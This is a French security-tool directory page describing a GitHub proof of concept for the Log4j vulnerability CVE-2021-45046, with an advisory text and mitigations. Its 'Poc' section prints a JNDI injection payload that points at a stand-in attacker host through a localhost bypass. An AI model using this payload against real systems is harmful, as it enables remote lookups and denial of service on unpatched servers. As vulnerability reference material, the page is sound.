Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4j_CVE-2021-45046 — Log4j 2.15.0 Escalade de privilèges -- CVE-2021-45046 | Kitploit
Outils/GitHubGitHub/cckuailong/log4j_cve-2021-45046
Analyse des VulnérabilitésExploitationTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubcckuailong/log4j_cve-2021-45046

Log4j_CVE-2021-45046

Log4j 2.15.0 Escalade de privilèges -- CVE-2021-45046

Voir le dépôt
227il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4j 2.15.0 Escalade de privilèges -- CVE-2021-45046

Attaque

Description

Il a été constaté que le correctif pour résoudre CVE-2021-44228 dans Apache Log4j 2.15.0 était incomplet dans certaines configurations non par défaut. Cela pourrait permettre à des attaquants ayant le contrôle sur les données d’entrée du Thread Context Map (MDC) lorsque la configuration de journalisation utilise un Pattern Layout non par défaut avec soit une Context Lookup (par exemple, $${ctx:loginId}) ou un modèle de Thread Context Map (%X, %mdc, ou %MDC) de concevoir des données d’entrée malveillantes à l’aide d’un modèle JNDI Lookup, entraînant une attaque par déni de service (DOS). Log4j 2.15.0 limite les recherches JNDI LDAP à localhost par défaut. Notez que les précédentes atténuations impliquant une configuration telle que définir la propriété système log4j2.noFormatMsgLookup à true n’atténuent PAS cette vulnérabilité spécifique. Log4j 2.16.0 corrige ce problème en supprimant la prise en charge des modèles de recherche de message et en désactivant la fonctionnalité JNDI par défaut. Ce problème peut être atténué dans les versions antérieures (<2.16.0) en supprimant la classe JndiLookup du classpath (exemple : zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

cvss 3.7 -> 9

Poc

root@kitploit:~
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}

Sujet Log4shell

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

Bienvenue pour contribuer à reapoc

https://github.com/cckuailong/reapoc

Télécharger l’outil